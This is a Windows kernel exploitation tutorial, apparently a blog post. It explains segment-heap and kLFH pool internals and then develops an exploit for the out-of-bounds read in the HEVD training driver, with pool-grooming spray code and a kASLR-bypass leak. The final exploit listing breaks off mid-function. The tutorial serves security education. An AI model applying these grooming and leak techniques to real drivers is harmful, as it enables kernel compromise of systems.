This section will cover a bit about some pre-segment heap internals as well as how the segment heap works after 19H1. First, Windows exposes the API ExAllocatePoolWithTag, the main API used for pool allocations, which kernel mode drivers use to allocate dynamic memory, much like malloc in user mode. However, drivers targeting Windows 10 2004 or later, according to Microsoft, must use ExAllocatePool2 instead of ExAllocatePoolWithTag, which has apparently been deprecated. For the purposes of this blog we will just refer to the “main allocation function” as ExAllocatePoolWithTag. One note about the “new” APIs is that they will initialize allocated pool chunks to zero.

Continuing on, ExAllocatePoolWithTag’s prototype can be seen below.
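As documented in wdm.h, the prototype is:

PVOID ExAllocatePoolWithTag(
    POOL_TYPE PoolType,       // which pool to allocate from
    SIZE_T    NumberOfBytes,  // size of the requested allocation
    ULONG     Tag             // four-character pool tag, e.g. 'Hack'
);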

The first parameter of this function is POOL_TYPE, an enumeration that specifies the type of memory to allocate. These values can be seen below.
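An abbreviated excerpt of the enumeration, trimmed to the values relevant here (the full enumeration in wdm.h contains more entries), looks like this:

typedef enum _POOL_TYPE {
    NonPagedPool                  = 0,    // non-pageable memory
    PagedPool                     = 1,    // pageable memory
    NonPagedPoolMustSucceed       = 2,    // deprecated
    DontUseThisType               = 3,
    NonPagedPoolCacheAligned      = 4,
    PagedPoolCacheAligned         = 5,
    NonPagedPoolCacheAlignedMustS = 6,
    MaxPoolType                   = 7,
    // ...
    NonPagedPoolNx                = 512   // non-pageable, no-execute
    // ...
} POOL_TYPE;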

Although there are many different types of allocations, notice how all of them, for the most part, are prefaced with NonPagedPool or PagedPool. This is because, on Windows, pool allocations come from one of these two pools (or they come from the session pool, which is beyond the scope of this post and is leveraged by win32k.sys). In user mode, developers have the default process heap to allocate chunks from, or they can create their own private heaps as well. The Windows pool works a little differently, as the system predefines two pools (for our purposes) of memory for servicing requests in the kernel. Recall also that allocations in the paged pool can be paged out of memory, while allocations in the non-paged pool will always remain paged in. This basically means memory in the NonPagedPool/NonPagedPoolNx is always accessible. This caveat also means that the non-paged pool is a more “expensive” resource and should be used accordingly.

As far as pool chunks go, the terminology is pretty much on point with a heap chunk, which I talked about in a previous blog on browser exploitation. Each pool chunk is prepended with a 0x10-byte _POOL_HEADER structure on 64-bit systems, which can be found using WinDbg.
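Rendered as a C structure (a sketch matching the layout that dt nt!_POOL_HEADER shows on this test machine), it looks roughly like this:

typedef struct _POOL_HEADER {
    union {
        struct {
            ULONG PreviousSize : 8;
            ULONG PoolIndex    : 8;
            ULONG BlockSize    : 8;   // chunk size in 0x10-byte units
            ULONG PoolType     : 8;
        };
        ULONG Ulong1;
    };
    ULONG PoolTag;                            // e.g. 'Hack' for HEVD allocations
    union {
        PEPROCESS ProcessBilled;              // offset 0x8
        struct {
            USHORT AllocatorBackTraceIndex;   // offset 0x8
            USHORT PoolTagHash;               // offset 0xa
        };
    };
} POOL_HEADER, *PPOOL_HEADER;                 // 0x10 bytes total on x64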

This structure contains metadata about the in-scope chunk. One interesting thing to note is that when a _POOL_HEADER structure is freed and it isn’t a valid header, a system crash will occur.

The ProcessBilled member of this structure is a pointer to the _EPROCESS object which made the allocation, but only if PoolQuota was set in the PoolType parameter of ExAllocatePoolWithTag. Notice that at an offset of 0x8 in this structure there is a union, as it is clear that two members reside at offset 0x8.

As a test, let’s set a breakpoint on nt!ExAllocatePoolWithTag. Since the Windows kernel will constantly call this function, we don’t need to create a driver that calls this function, as the system will already do this.

After setting a breakpoint, we can execute the function and examine the return value, which is the pool chunk that is allocated.

Notice how the ProcessBilled member isn’t a valid pointer to an _EPROCESS object. This is because this is a vanilla call to nt!ExAllocatePoolWithTag, without any scheduling quota madness going on, meaning the ProcessBilled member isn’t set. Since the AllocatorBackTraceIndex and PoolTagHash are obviously stored in a union, based on the fact that both the ProcessBilled and AllocatorBackTraceIndex members are at the same offset in memory, the two members AllocatorBackTraceIndex and PoolTagHash are actually “carried over” into the ProcessBilled member. This won’t affect anything, since the ProcessBilled member isn’t accounted for due to the fact that PoolQuota wasn’t set in the PoolType parameter, and this is how WinDbg interprets the memory layout. If the PoolQuota was set, the EPROCESS pointer is actually XOR’d with a random “cookie”, meaning that if you wanted to reconstruct this header you would need to first leak the cookie. This information will be useful later on in the pool overflow vulnerability in part 2, which will not leverage PoolQuota.

Let’s now talk about the segment heap. The segment heap, which was already present in user mode, was implemented into the Windows kernel with the 19H1 build of Windows 10. The “gist” of the segment heap is this: when a component in the kernel requests some dynamic memory, via one of the previously mentioned API calls, there are now four options that can service the request. They are:

  1. Low Fragmentation Heap (kLFH)
  2. Variable Size (VS)
  3. Segment Alloc
  4. Large Alloc

Each pool is now managed by a _SEGMENT_HEAP structure, as seen below, which provides references to various “segments” in use for the pool and contains metadata for the pool.

The vulnerabilities mentioned in this blog post will revolve around the kLFH, so I highly recommend reading this paper to find out more about the internals of each allocator, as well as checking out Yarden Shafir’s upcoming BlackHat talk on pool internals in the age of the segment heap!

For the purposes of this exploit and as a general note, let’s talk about how the _POOL_HEADER structure is used.

We talked about the _POOL_HEADER structure earlier - but let’s dig a bit deeper into that concept to see if/when it is even used when the segment heap is enabled.

Any size allocation that cannot fit into a Variable Size segment allocation will pretty much end up in the kLFH. What is interesting here is that the _POOL_HEADER structure is no longer used for chunks within the VS segment. Chunks allocated using the VS segment are actually prefaced with a header structure called _HEAP_VS_CHUNK_HEADER, which was pointed out to me by my co-worker Yarden Shafir. This structure can be seen in WinDbg.

The interesting fact about pool headers with the segment heap is that the kLFH, which will be the target for this post, actually still uses _POOL_HEADER structures to preface pool chunks.

Chunks allocated by the kLFH and VS segments are shown below.

Why does this matter? For the purposes of exploitation in part 2, there will be a pool overflow at some point during exploitation. Since we know that pool chunks are prefaced with a header, and because we know that an invalid header will cause a crash, we need to be mindful of this. Using our overflow, we will need to make sure that a valid header is present during exploitation. Since our exploit will be targeting the kLFH, which still uses the standard _POOL_HEADER structure with no encoding, this will prove to be rather trivial later. _HEAP_VS_CHUNK_HEADER, however, performs additional encoding on its members.

The “last piece of this puzzle” is to understand how we can force the system to allocate pool chunks via the kLFH segment. The kLFH services requests that range in size from 1 byte to 16,368 bytes. The kLFH segment is also managed by the _HEAP_LFH_CONTEXT structure, which can be dumped in WinDbg.

The kLFH has “buckets” for each allocation size. The tl;dr here is if you want to trigger the kLFH you need to make 16 consecutive requests to the same size bucket. There are 129 buckets, and each bucket has a “granularity”. Let’s look at a chart to see the determining factors in where an allocation resides in the kLFH, based on size, which was taken from the previously mentioned paper from Corentin and Paul.

This means that allocations at a 16-byte granularity (e.g. 1-16 bytes, 17-32 bytes, etc.) are placed into buckets 1-64, starting with bucket 1 for allocations of 1-16 bytes, bucket 2 for 17-32 bytes, and so on; the granularity then increases for the higher buckets, up to a 512-byte granularity. Anything larger is either serviced by the VS segment or by other components of the segment heap.

Let’s say we perform a pool spray of objects which are 0x40 bytes and we do this 100 times. We can expect that most of these allocations will get stored in the kLFH, due to the heuristic of 16 consecutive allocations and because the size matches one of the buckets provided by the kLFH. This is very useful for exploitation, as it means there is a good chance we can groom the pool relatively well. Grooming refers to getting a lot of pool chunks, which we control, lined up adjacent to each other in order to make exploitation reliable. For example, if we can groom the pool with objects we control, one after the other, we can ensure that a pool overflow will overflow data which we control, leading to exploitation. We will touch a lot more on this in the future.

The kLFH also uses these predetermined buckets to manage chunks. This removes something known as coalescing, which is when the pool manager combines multiple free chunks into a bigger chunk for performance. Now, with the kLFH, because of this architecture, we know that if we free an object in the kLFH, the freed slot will remain free until it is used again by an allocation of that specific size. For example, if we are working in bucket 1, which can hold anything from 1 byte to 1008 bytes, and we allocate two objects of the size 1008 bytes and then free these objects, the pool manager will not combine these slots, because that would result in a free chunk of 2016 bytes, which doesn’t fit into the bucket, which can only hold 1-1008 bytes. This means the kLFH will keep these slots free until the next allocation of this size comes in and uses them. This also will be useful later on.

However, what are the drawbacks to the kLFH? Since the kLFH uses predetermined sizes, we need to be very lucky to have a driver allocate objects which are of the same size as a vulnerable object which can be overflowed or manipulated. Let’s say we can perform a pool overflow into an adjacent chunk as such, in this expertly crafted Microsoft Paint diagram.

If this overflow is happening in a kLFH bucket on the NonPagedPoolNx, for instance, we know that an overflow from one chunk will overflow into another chunk of the EXACT same size. This is because of the kLFH buckets, which predetermine which sizes are allowed in a bucket, which then determines what sizes adjacent pool chunks are. So, in this situation (and as we will showcase in this blog) the chunk that is adjacent to the vulnerable chunk must be of the same size as the chunk and must be allocated on the same pool type, which in this case is the NonPagedPoolNx. This severely limits the scope of objects we can use for grooming, as we need to find objects, whether they are typedef objects from a driver itself or a native Windows object that can be allocated from user mode, that are the same size as the object we are overflowing. Not only that, but the object must also contain some sort of interesting member, like a function pointer, to make the overflow worthwhile. This means now we need to find objects that are capped at a certain size, allocated in the same pool, and contain something interesting.

The last thing to say before we get into the out-of-bounds read is that some of the elements of this exploit are slightly contrived to outline successful exploitation. I will say, however, I have seen drivers which allocate pool memory, let unauthenticated clients specify the size of the allocation, and then return the contents to user mode - so this isn’t to say that there are not poorly written drivers out there. I do just want to call out, however, this post is more about the underlying concepts of pool exploitation in the age of the segment heap versus some “new” or “novel” way to bypass some of the stipulations of the segment heap. Now, let’s get into exploitation.

From Out-Of-Bounds-Read to kASLR bypass - Low-Integrity Exploitation

Let’s take a look at the file in HEVD called MemoryDisclosureNonPagedPoolNx.c. We will start with the code and eventually move our way into dynamic analysis with WinDbg.
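In condensed form, the routine looks roughly like the following sketch, which is based on the description that follows rather than the verbatim HEVD source (SAL annotations and full error handling are trimmed):

NTSTATUS TriggerMemoryDisclosureNonPagedPoolNx(PVOID UserOutputBuffer, SIZE_T Size)
{
    NTSTATUS Status = STATUS_SUCCESS;
    PVOID KernelBuffer = NULL;

    // Allocate a 0x70-byte (POOL_BUFFER_SIZE) chunk on the NonPagedPoolNx with the 'Hack' tag
    KernelBuffer = ExAllocatePoolWithTag(NonPagedPoolNx, POOL_BUFFER_SIZE, POOL_TAG);
    if (KernelBuffer == NULL)
    {
        return STATUS_INSUFFICIENT_RESOURCES;
    }

    // Fill the chunk with 0x41 ('A') characters
    RtlFillMemory(KernelBuffer, POOL_BUFFER_SIZE, 0x41);

    // Make sure the output buffer really resides in user mode
    ProbeForWrite(UserOutputBuffer, Size, (ULONG)__alignof(UCHAR));

#ifdef SECURE
    // Secure version: copy only as many bytes as were allocated
    RtlCopyMemory(UserOutputBuffer, KernelBuffer, POOL_BUFFER_SIZE);
#else
    // Vulnerable version: the caller-controlled size decides how many bytes are copied back
    RtlCopyMemory(UserOutputBuffer, KernelBuffer, Size);
#endif

    ExFreePoolWithTag(KernelBuffer, POOL_TAG);
    return Status;
}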

The above snippet of code is a function defined as TriggerMemoryDisclosureNonPagedPoolNx, which has a return type of NTSTATUS. This code invokes ExAllocatePoolWithTag and creates a pool chunk on the NonPagedPoolNx kernel pool of size POOL_BUFFER_SIZE and with the pool tag POOL_TAG. Tracing the value of POOL_BUFFER_SIZE in MemoryDisclosureNonPagedPoolNx.h, which is included in the MemoryDisclosureNonPagedPoolNx.c file, we can see that the pool chunk allocated here is 0x70 bytes in size. POOL_TAG is also defined in Common.h as kcaH, which is more humanly readable as Hack.

After the pool chunk is allocated in the NonPagedPoolNx it is filled with 0x41 characters, 0x70 of them to be precise, as seen in the call to RtlFillMemory. There is no vulnerability here yet, as nothing so far is influenced by a client invoking an IOCTL which would reach this routine. Let’s continue down the code to see what happens.

After initializing the buffer to a value of 0x70 0x41 characters, the first defined parameter in TriggerMemoryDisclosureNonPagedPoolNx, which is PVOID UserOutputBuffer, is passed to a ProbeForWrite routine to ensure this buffer resides in user mode. Where does UserOutputBuffer come from (besides its obvious name)? Let’s view where the function TriggerMemoryDisclosureNonPagedPoolNx is actually invoked from, which is at the end of MemoryDisclosureNonPagedPoolNx.c.

We can see that the first argument passed to TriggerMemoryDisclosureNonPagedPoolNx, the function we have been analyzing thus far, is called UserOutputBuffer. This variable comes from the I/O Request Packet (IRP) which was passed to the driver and created by a client invoking DeviceIoControl to interact with the driver. More specifically, this comes from the IO_STACK_LOCATION structure, which always accompanies an IRP. This structure contains many members and data used by the IRP to pass information to the driver. In this case, the associated IO_STACK_LOCATION structure contains most of the parameters used by the client in the call to DeviceIoControl. The IRP structure itself contains the UserBuffer member, which is actually the output buffer supplied by a client using DeviceIoControl. This means that this buffer will be bubbled back up to user mode, or to any client for that matter, which sends an IOCTL code that reaches this routine. I know this seems like a mouthful right now, but I will give the “tl;dr” here in a second.

Essentially what happens here is a user-mode client can specify a size and a buffer, which will get used in the call to TriggerMemoryDisclosureNonPagedPoolNx. Let’s then take a quick look back at the image from two images ago, which has again been displayed below for brevity.

Skipping over the #ifdef SECURE directive, which is obviously what a “secure” driver should use, we can see that if the allocation of the pool chunk we previously mentioned, which is of size POOL_BUFFER_SIZE, or 0x70 bytes, is successful - the contents of the pool chunk are written to the UserOutputBuffer variable, which will be returned to the client invoking DeviceIoControl, and the amount of data copied to this buffer is actually decided by the client via the nOutBufferSize parameter.

What is the issue here? ExAllocatePoolWithTag allocates a fixed-size pool chunk of POOL_BUFFER_SIZE bytes. The issue is that the developer of this driver is not just copying that fixed amount to the UserOutputBuffer parameter - the call to RtlCopyMemory allows the client to decide the number of bytes written to the UserOutputBuffer parameter. This isn’t an issue of a buffer overflow on the UserOutputBuffer side, as we fully control this buffer via our call to DeviceIoControl and can make it large enough to avoid it being overflowed. The issue is the second and third parameters.

The pool chunk allocated in this case is 0x70 bytes. If we look at the #ifdef SECURE directive, we can see that the KernelBuffer created by the call to ExAllocatePoolWithTag is copied to the UserOutputBuffer parameter and NOTHING MORE, as defined by the POOL_BUFFER_SIZE parameter. Since the allocation created is only POOL_BUFFER_SIZE, we should only allow the copy operation to copy this many bytes.

If a size greater than 0x70, or POOL_BUFFER_SIZE, is provided to the RtlCopyMemory function, then the contents of the adjacent pool chunk right after the KernelBuffer pool chunk would also be copied to the UserOutputBuffer. The below diagram outlines this.

If the size of the copy operation is greater than the allocation size of 0x70 bytes, the bytes after the first 0x70 are taken from the adjacent chunk and are also bubbled back up to user mode. In the case of supplying a value of 0x100 in the size parameter, which is controllable by the caller, the 0x70 bytes from the allocation would be copied back into user mode and the next 0x30 bytes from the adjacent chunk would also be copied back into user mode. Let’s verify this in WinDbg.

For brevity’s sake, the routine to reach this code is via the IOCTL 0x0022204f. Here is the code we are going to send to the driver.
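A minimal sketch of the trigger is shown below; driverHandle is assumed to be a handle to the HEVD device obtained via CreateFileA, and the output buffer size is what ends up in the size parameter of the copy:

BYTE outputBuffer[0x70] = { 0 };
DWORD bytesReturned = 0;

DeviceIoControl(
    driverHandle,          // handle to \\.\HackSysExtremeVulnerableDriver
    0x0022204f,            // IOCTL that reaches TriggerMemoryDisclosureNonPagedPoolNx
    NULL,                  // no input buffer
    0,
    outputBuffer,          // user-mode output buffer (UserOutputBuffer)
    sizeof(outputBuffer),  // number of bytes the driver will copy back
    &bytesReturned,
    NULL
);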

We can start by setting a breakpoint on HEVD!TriggerMemoryDisclosureNonPagedPoolNx.

Per the __fastcall calling convention, the two arguments passed to TriggerMemoryDisclosureNonPagedPoolNx will be in RCX (the UserOutputBuffer parameter) and RDX (the size specified by us). Dumping the RCX register, we can see the 0x70 bytes that will hold the allocation’s contents.

We can then set a breakpoint on the call to nt!ExAllocatePoolWithTag and resume execution with g.

After executing the call, we can then inspect the return value in RAX.

Interesting! We know the IOCTL code in this case allocated a pool chunk of 0x70 bytes, but every allocation in the pool page our chunk resides in, which is denoted with the asterisk above, is actually 0x80 bytes. Remember - each chunk in the kLFH is prefaced with a _POOL_HEADER structure. We can validate this below by dumping the PoolTag member of the _POOL_HEADER at the expected offset.

The total size of this pool chunk with the header is 0x80 bytes. Recall from earlier, when we spoke about the kLFH, that an allocation of this size would fall within the kLFH! We know the next thing the code will do in this situation is copy 0x41 values into the newly allocated chunk. Let’s set a breakpoint on HEVD!memset, which is actually just what the RtlFillMemory macro defaults to.

Inspecting the return value, we can see the buffer was initialized to 0x41 values.

The next action, as we can recall, is the copying of the data from the newly allocated chunk to user mode. Setting a breakpoint on the HEVD!memcpy call, which is the actual function the macro RtlCopyMemory will call, we can inspect RCX, RDX, and R8, which will be the destination, source, and size respectively.

Notice the value in RCX, which is a user-mode address (the address of our output buffer supplied by DeviceIoControl), is different from the original value shown. This is simply because I had to re-run the POC trigger between the original screenshot and the current one. Other than that, nothing else has changed.

After stepping through the memcpy call we can clearly see the contents of the pool chunk are returned to user mode.

Perfect! This is expected behavior by the driver. However, let’s try increasing the size of the output buffer and see what happens, per our hypothesis on this vulnerability. This time, let’s set the output buffer to 0x100.

This time, let’s just inspect the memcpy call.

Take note of the above highlighted content after the 0x41 values.

Let’s now check out the pool chunks in this pool and view the adjacent chunk to our Hack pool chunk.

Last time we performed the IOCTL invocation, only values of 0x41 were bubbled back up to user mode. However, recall that this time we specified a value of 0x100. This means this time we should also be returning the next 0x30 bytes after the Hack pool chunk back to user mode. Taking a look at the previous image, we can see that the chunk directly after the Hack chunk is 0xffffe48f4254fb00, which contains a value of 6c54655302081b00 and so on - the _POOL_HEADER for the next chunk, as seen below.

These 0x10 bytes, plus the next 0x20 bytes should be returned to us in user mode, as we specified we want to go beyond the bounds of the pool chunk, hence an “out-of-bounds read”. Executing the POC, we can see this is the case!

Awesome! We can see, minus some of the endianness madness that is occurring, we have successfully read memory from the adjacent chunk! This is very useful, but remember what our goal is - we want to bypass kASLR. This means we need to leak some sort of pointer either from the driver or from ntoskrnl.exe itself. How can we achieve this if all we can leak is the next adjacent pool chunk? To do this, we need to perform some additional steps to ensure that, while we are in the kLFH segment, the adjacent chunk(s) always contain some sort of useful pointer that can be leaked by us. This process is called “pool grooming”.

Taking The Dog To The Groomer

Up until this point we know we can read data from adjacent pool chunks, but as of now there isn’t really anything interesting next to these chunks. So, how do we combat this? Let’s talk about a few assumptions here:

  1. We know that if we can choose an object to read from, this object will need to be 0x70 bytes in size (0x80 when you include the _POOL_HEADER)
  2. This object needs to be allocated on the NonPagedPoolNx directly after the chunk allocated by HEVD in MemoryDisclosureNonPagedPoolNx
  3. This object needs to contain some sort of useful pointer

How can we go about doing this? Let’s sort of visualize what the kLFH does in order to service requests of 0x70 bytes (technically 0x80 with the header). Please note that the following diagram is for visual purposes only.

As we can see, there are several free slots within this specific page in the pool. If we allocated an object of size 0x80 (technically 0x70, where the _POOL_HEADER is dynamically created) we have no way to know, or to force, where the allocation will occur. That said, the kLFH may not even be enabled at all, due to the heuristic requirement of 16 consecutive allocations to the same size bucket. Where does this leave us? Well, what we can do is first make sure the kLFH is enabled and then “fill” all of the “holes”, or currently freed allocations, with a set of objects. This will force the memory manager to allocate a new page entirely to service new allocations. This process of the memory manager allocating a new page for future allocations within the kLFH bucket is ideal, as it gives us a “clean slate” to start on without random free chunks that could be serviced at random intervals. We want to do this before we invoke the IOCTL which triggers the TriggerMemoryDisclosureNonPagedPoolNx function in MemoryDisclosureNonPagedPoolNx.c. This is because we want the allocation for the vulnerable pool chunk, which will be the same size as the objects we use for “spraying” the pool to fill the holes, to end up in the same page as the sprayed objects we have control over. This will allow us to groom the pool and make sure that we can read from a chunk that contains some useful information.

Let’s recall the previous image which shows where the vulnerable pool chunk ends up currently.

Organically, without any grooming/spraying, we can see that there are several other types of objects in this page. Notably, we can see several Even tags. This is the pool tag used for objects created with a call to CreateEvent, a Windows API which can be invoked from user mode. The prototype can be seen below.
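From the Windows SDK, the CreateEventA prototype is:

HANDLE CreateEventA(
    LPSECURITY_ATTRIBUTES lpEventAttributes,  // optional security descriptor
    BOOL                  bManualReset,       // manual-reset vs. auto-reset event
    BOOL                  bInitialState,      // initial signaled state
    LPCSTR                lpName              // optional name, NULL for unnamed
);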

This function returns a handle to the object, which is technically backed by a pool chunk in kernel mode. This is reminiscent of when we obtain a handle to the driver for the call to CreateFile. The handle is an intermediary object that we can interact with from user mode, which has a kernel mode component.

Let’s update the code to leverage CreateEventA to spray an arbitrary number of objects, 5000.

After executing the newly updated code and setting a breakpoint on the copy location for the vulnerable pool chunk, take a look at the state of the page which contains that chunk.

This isn’t in an ideal state yet, but notice how we have influenced the page’s layout. We can now see that there are many free objects and a few event objects. This behavior suggests we got a new page for our vulnerable chunk to land in, as our vulnerable chunk is preceded by several event objects and allocated directly after them. We can also perform additional analysis by inspecting the previous page (recall that for our purposes, on this 64-bit Windows 10 install, a page is 0x1000 bytes, or 4KB).

It seems as though all of the previous chunks that were free have been filled with event objects!

Notice, though, that the pool layout is not perfect. This is due to other components of the kernel also leveraging the kLFH bucket for 0x70 byte allocations (0x80 with the _POOL_HEADER).

Now that we know we can influence the behavior of the pool from spraying, the goal is to fill the entire new page with event objects and then free every other object we control in the new page. Right after freeing every other object, we will create another object of the same size as the event object(s) we just freed. By doing this, the kLFH, due to optimization, will fill the free slots with the new objects we allocate. This is because the current page is the only page that should have free slots available in the NonPagedPoolNx for allocations that are being serviced by the kLFH for size 0x70 (0x80 including the header).

We would like the pool layout to look like this (for the time being):

EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT 

So what kind of object would we like to place in the “holes” we want to poke? This object is the one we want to leak back to user mode, so it should contain either valuable kernel information or a function pointer. This is the hardest/most tedious part of pool corruption: finding something that is not only the size needed, but that also contains valuable information. This especially holds true if you cannot use a generic Windows object and need to use a structure that is specific to a driver.

In any event, this next part is a bit “simplified”. It will take a bit of reverse engineering/debugging of the calls that allocate pool chunks for objects to find a suitable candidate. The way to approach this, at least in my opinion, would be as follows:

  1. Identify calls to ExAllocatePoolWithTag, or similar APIs
  2. Narrow this list down by finding calls to the aforementioned API(s) that are allocated within the pool you are able to corrupt (e.g. if I have a vulnerability on the NonPagedPoolNx, find an allocation on the NonPagedPoolNx)
  3. Narrow this list further by finding calls that meet the above criteria and allocate a chunk of the size you need
  4. If you have made it this far, narrow this down further by finding an object with all of the above attributes and with an interesting member, such as a function pointer

However, since we can use the source code, this is slightly easier - let's find a suitable object within HEVD. In HEVD there is an object which contains a function pointer, called USE_AFTER_FREE_NON_PAGED_POOL_NX. It is constructed as such, within UseAfterFreeNonPagedPoolNx.h:
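In rough form, the structure looks like this (a sketch - the exact Buffer size is illustrative; what matters is the leading function pointer and the overall 0x70-byte size before the _POOL_HEADER):

typedef void (*FunctionPointer)(void);

typedef struct _USE_AFTER_FREE_NON_PAGED_POOL_NX {
    FunctionPointer Callback;   // set to UaFObjectCallbackNonPagedPoolNx, an address inside HEVD
    CHAR Buffer[0x68];          // initialized with 0x41 characters (size shown is illustrative)
} USE_AFTER_FREE_NON_PAGED_POOL_NX, *PUSE_AFTER_FREE_NON_PAGED_POOL_NX;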

This structure is used in a function call within UseAfterFreeNonPagedPoolNx.c and the Buffer member is initialized with 0x41 characters.

The Callback member, which is a function pointer type defined in Common.h as typedef void (*FunctionPointer)(void);, is set to the memory address of UaFObjectCallbackNonPagedPoolNx, which is a function located in UseAfterFreeNonPagedPoolNx.c, shown two images ago! This means a member of this structure will contain a function pointer within HEVD - a kernel mode address. We know by the name that this object will be allocated on the NonPagedPoolNx, but you could still validate this by performing static analysis on the call to ExAllocatePoolWithTag to see what value is specified for POOL_TYPE.

This seems like a perfect candidate! The goal will be to leak this structure back to user mode with the out-of-bounds read vulnerability! The only factor that remains is size - we need to make sure this object is also 0x70 bytes in size, so it lands within the same pool page we control.

Let’s test this in WinDbg. In order to reach the AllocateUaFObjectNonPagedPoolNx function we need to interact with the IOCTL handler for this particular routine, which is defined in NonPagedPoolNx.c.

The IOCTL code needed to reach this routine, for brevity, is 0x00222053. Let’s set a breakpoint on HEVD!AllocateUaFObjectNonPagedPoolNx in WinDbg, issue a DeviceIoControl call to this IOCTL without any buffers, and see what size is being used in the call to ExAllocatePoolWithTag to allocate this object.

Perfect! Slightly contrived, but nonetheless true: the object being created here is also 0x70 bytes (without the _POOL_HEADER structure) - meaning this object should be allocated into the free slots within the page where our event objects live! Let’s update our POC to perform the following:

  1. Free every other event object
  2. Replace every other event object (5000/2 = 2500) with a USE_AFTER_FREE_NON_PAGED_POOL_NX object

Using the same memcpy (RtlCopyMemory) breakpoint from the original out-of-bounds read IOCTL invocation into the vulnerable pool chunk, we can inspect the pool chunk used in the copy operation - the chunk bubbled back up to user mode - to showcase that our event objects are now adjacent to multiple USE_AFTER_FREE_NON_PAGED_POOL_NX objects.

We can see that the Hack tagged chunks, which are USE_AFTER_FREE_NON_PAGED_POOL_NX chunks, are pretty much adjacent to the event objects! Even if not every object is perfectly adjacent to the previous event object, this is not a worry to us, because the vulnerability allows us to specify how much of the data from the adjacent chunks we would like to return to user mode anyways. This means we could specify an arbitrary amount, such as 0x1000 bytes, and that is how many bytes would be returned from the adjacent chunks.

Since there are many adjacent chunks, this will result in an information leak. The reason for this is that the kLFH has a bit of “funkiness” going on. After talking with my colleague Yarden Shafir, I found out that this isn’t necessarily due to any sort of kLFH “randomization” of where the free chunks will be or where the allocations will occur, but due to the complexity of the subsegment locations, caching, etc. Things can get complex quite quickly, and this is beyond the scope of this blog post.

The only time this becomes an issue, however, is when clients can read out-of-bounds but cannot specify how many bytes out-of-bounds they can read. This would result in exploits needing to run a few times in order to leak a valid kernel address, until the chunks become adjacent. However, someone who is better at pool grooming than myself could easily figure this out I am sure :).

Now that we can groom the pool decently enough, the next step is to replace the rest of the event objects with vulnerable objects from the out-of-bounds read vulnerability! The desired layout of the pool will be this:

VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX 

Why do we want this to be the desired layout? Each of the VULNERABLE_OBJECTS can read additional data from adjacent chunks. Since (theoretically) the next adjacent chunk should be USE_AFTER_FREE_NON_PAGED_POOL_NX, we should be returning this entire chunk to user mode. Since this structure contains a function pointer in HEVD, we can then bypass kASLR by leaking a pointer from HEVD! To do this, we will need to perform the following steps:

  1. Free the rest of the event objects
  2. Perform a number of calls to the IOCTL handler for allocating vulnerable chunks

For step two, we don’t want to perform 2500 DeviceIoControl calls, as there is potential for one of the last memory addresses in the page to be set to one of our vulnerable objects. If we specify we want to read 0x1000 bytes, and our vulnerable object is at the end of the last valid page for the pool, the read will go 0x1000 bytes past it, which may land in a page that is not currently committed to memory, causing a DoS by referencing invalid memory. To compensate for this, we only want to allocate 100 vulnerable objects, as one of them will almost surely be allocated in a block adjacent to a USE_AFTER_FREE_NON_PAGED_POOL_NX object.

To do this, let’s update the code as follows.

After freeing the event objects and reading back data from adjacent chunks, a for loop parses the output for anything that is sign-extended (a kernel-mode address). Since the output buffer is returned as an array of unsigned long long values (the size of a 64-bit address), and since the address we want to leak is the first member of the adjacent chunk, right after the leaked _POOL_HEADER, it lands in a clean 64-bit slot and is therefore easily parsed. Once we have leaked the address of the function pointer, we can calculate the distance from that function to the base of HEVD, subtract that distance, and obtain the base of HEVD!

Executing the final exploit, leveraging the same breakpoint on the final HEVD!memcpy call (remember, we are executing 100 calls to the final DeviceIoControl routine, which invokes the RtlCopyMemory routine, meaning we need to step through 99 times to hit the final copy back into user mode), we can see the layout of the pool.

The above image is a bit difficult to decipher, given that both the vulnerable chunks and the USE_AFTER_FREE_NON_PAGED_POOL_NX chunks have Hack tags. However, if we take the chunk adjacent to the current chunk (a vulnerable chunk we can read past, denoted by an asterisk) and parse it as a USE_AFTER_FREE_NON_PAGED_POOL_NX object, we can clearly see that this object is of the correct type and contains a function pointer within HEVD!

We can then subtract the distance from this function pointer to the base of HEVD, and update our code accordingly. We can see the distance is 0x880cc, so adding this to the code is trivial.

After performing the calculation, we can see we have bypassed kASLR, from low integrity, without any calls to EnumDeviceDrivers or similar APIs!

The final code can be seen below.

// HackSysExtreme Vulnerable Driver: Pool Overflow/Memory Disclosure
// Author: Connor McGarr(@33y0re)

// Vulnerability description: Arbitrary read primitive
// User-mode clients have the ability to control the size of an allocated pool chunk on the NonPagedPoolNx
// This pool chunk is 0x80 bytes (including the header)
// There is an object, a UafObject created by HEVD, that is 0x80 bytes in size (including the header) and contains a function pointer that is to be read -- this must be used due to the kLFH, which is only groomable for sizes in the same bucket
// CreateEventA can be used to allocate 0x80 byte objects, including the size of the header, which can also be used for grooming

#include <windows.h>
#include <stdio.h>

// Fill the holes in the NonPagedPoolNx of 0x80 bytes
void memLeak(HANDLE driverHandle)
{
  // Array to manage handles opened by CreateEventA
  HANDLE eventObjects[5000];

  // Spray 5000 objects to fill the new page
  for (int i = 0; i < 5000; i++)
  {
    // Create the objects
    HANDLE tempHandle = CreateEventA(
      NULL,
      FALSE,
      FALSE,
      NULL
    );

    // Assign the handles to the array
    eventObjects[i] = tempHandle;
  }

  // Check to see if the first handle is a valid handle
  if (eventObjects[0] == NULL)
  {
    printf("[-] Error! Unable to spray CreateEventA objects! Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    printf("[+] Sprayed CreateEventA objects to fill holes of size 0x80!\n");

    // Close half of the handles
    for (int i = 0; i < 5000; i += 2)
    {
      BOOL tempHandle1 = CloseHandle(
        eventObjects[i]
      );

      eventObjects[i] = NULL;

      // Error handling
      if (!tempHandle1)
      {
        printf("[-] Error! Unable to free the CreateEventA objects! Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
    }

    printf("[+] Poked holes in the new pool page!\n");

    // Allocate UaF Objects in place of the poked holes by just invoking the IOCTL, which will call ExAllocatePoolWithTag for a UAF object
    // kLFH should automatically fill the freed holes with the UAF objects
    DWORD bytesReturned;

    for (int i = 0; i < 2500; i++)
    {
      DeviceIoControl(
        driverHandle,
        0x00222053,
        NULL,
